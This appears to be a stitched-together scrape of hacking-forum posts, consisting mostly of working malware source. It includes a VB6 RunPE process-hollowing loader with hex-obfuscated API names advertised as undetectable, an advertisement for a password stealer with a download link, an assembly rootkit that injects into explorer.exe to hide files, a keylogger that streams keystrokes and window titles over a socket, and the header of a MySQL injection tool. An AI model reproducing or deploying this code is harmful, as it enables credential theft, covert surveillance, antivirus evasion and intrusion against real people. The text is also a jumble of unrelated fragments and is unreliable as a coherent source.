tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If 'kernel32 lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC 'ntdll lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC If sHost = vbNullString Then sHost = Space(260) 'GetModuleFileNameW lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC Invoke lMod, App.hInstance, StrPtr(sHost), 260 End If With tIMAGE_NT_HEADERS.OptionalHeader tSTARTUPINFO.cb = Len(tSTARTUPINFO) 'CreateProcessW lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION) 'NtUnmapViewOfSection lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase 'VirtualAllocEx lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0 For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i tCONTEXT.ContextFlags = CONTEXT_FULL 'NtGetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0 tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint 'NtSetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtResumeThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, 0 hProc = tPROCESS_INFORMATION.hProcess End With RunPE = True End Function Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + .DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! BTW, Its a class module (*.cls)

by E0N struct IMAGE_DOS_HEADER e_magic dw ? ; Magic number e_cblp dw ? ; Bytes on last page of file e_cp dw ? ; Pages in file e_crlc dw ? ; Relocations e_cparhdr dw ? ; Size of header in paragraphs e_minalloc dw ? ; Minimum extra paragraphs needed e_maxalloc dw ? ; Maximum extra paragraphs needed e_ss dw ? ; Initial (relative) SS value e_sp dw ? ; Initial SP value e_csum dw ? ; Checksum e_ip dw ? ; Initial IP value e_cs dw ? ; Initial (relative) CS value e_lfarlc dw ? ; File address of relocation table e_ovno dw ? ; Overlay number e_res0 dw ? ; Reserved words e_res1 dw ? e_res2 dw ? e_res3 dw ? e_oemid dw ? ; OEM identifier (for e_oeminfo) e_oeminfo dw ? ; OEM information; e_oemid specific e_res20 dw ? ; Reserved words e_res21 dw ? e_res22 dw ? e_res23 dw ? e_res24 dw ? e_res25 dw ? e_res26 dw ? e_res27 dw ? e_res28 dw ? e_res29 dw ? e_lfanew dd ? ; File address of new exe header ends struct IMAGE_FILE_HEADER Machine dw ? NumberOfSections dw ? TimeDateStamp dd ? PointerToSymbolTable dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? characteristics dw ? ends struct IMAGE_DATA_DIRECTORY VirtualAddress dd ? Size dd ? ends struct IMAGE_OPTIONAL_HEADER ; Standard fields. Magic dw ? MajorLinkerVersion db ? MinorLinkerVersion db ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUnitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ; NT additional fields. ImageBase dd ? SectionAlignment dd ? FileAlignment dd ? MajorOperatingSystemVersion dw ? MinorOperatingSystemVersion dw ? MajorImageVersion dw ? MinorImageVersion dw ? MajorSubsystemVersion dw ? MinorSubsystemVersion dw ? W32VersionValue dd ? SizeOfImage dd ? SizeOfHeaders dd ? CheckSum dd ? SubSystem dw ? DllCharacteristics dw ? SizeOfStackReserve dd ? SizeOfStackCommit dd ? SizeOfHeapReserve dd ? SizeOfHeapCommit dd ? LoaderFlags dd ? NumberOfRvaAndSizes dd ? DataDirectory1 IMAGE_DATA_DIRECTORY ? DataDirectory2 IMAGE_DATA_DIRECTORY ? DataDirectory3 IMAGE_DATA_DIRECTORY ? DataDirectory4 IMAGE_DATA_DIRECTORY ? DataDirectory5 IMAGE_DATA_DIRECTORY ? DataDirectory6 IMAGE_DATA_DIRECTORY ? DataDirectory7 IMAGE_DATA_DIRECTORY ? DataDirectory8 IMAGE_DATA_DIRECTORY ? DataDirectory9 IMAGE_DATA_DIRECTORY ? DataDirectory10 IMAGE_DATA_DIRECTORY ? DataDirectory11 IMAGE_DATA_DIRECTORY ? DataDirectory12 IMAGE_DATA_DIRECTORY ? DataDirectory13 IMAGE_DATA_DIRECTORY ? DataDirectory14 IMAGE_DATA_DIRECTORY ? DataDirectory15 IMAGE_DATA_DIRECTORY ? DataDirectory16 IMAGE_DATA_DIRECTORY ? ends struct IMAGE_NT_HEADERS Signature dd ? FileHeader IMAGE_FILE_HEADER ? OptionalHeader IMAGE_OPTIONAL_HEADER ? ends

by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8 Only gets 1 Password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maby trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copys for sale! Also, This is first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html

Credit to protos the autor of this code require 'digest/md5' require 'digest/sha1' require 'base64' require 'tk' root= TkRoot.new() {title "Encripter By pRotos"} TkLabel.new(root) { text "Palabra a Encriptar" pack { padx 20 ; pady 20; side 'top' } } palabra = TkVariable.new() TkEntry.new(root) { textvariable(palabra) pack() } TkLabel.new(root) { text " MD5" pack ("side"=>"bottom") } md5 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "SHA1" pack ('side'=> 'bottom') } sha = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "Base64" pack ( 'side'=> 'bottom' ) } b64 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkButton.new(root) { text " Encripta" command proc { amd5 = Digest::MD5.hexdigest(palabra.value) asha1 = Digest::SHA1.hexdigest(palabra.value) ab64 = Base64.encode64(palabra.value) puts " _MD5_", amd5 puts " _SHA1_", asha1 puts " _Base64_", ab64 md5.insert('end', amd5) sha.insert('end', asha1) b64.insert('end', ab64) } pack("side"=>"top") } TkButton.new(root) { text " Clear " command proc { md5.clear sha.clear b64.clear } pack("side"=>"bottom") } Tk.mainloop()

;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress locals BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc FuncionHook,hFindFile,lpFindFileData Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start

include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if byte[eax]=VK_ESCAPE stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC stdcall isShift cmp ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp

# *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), 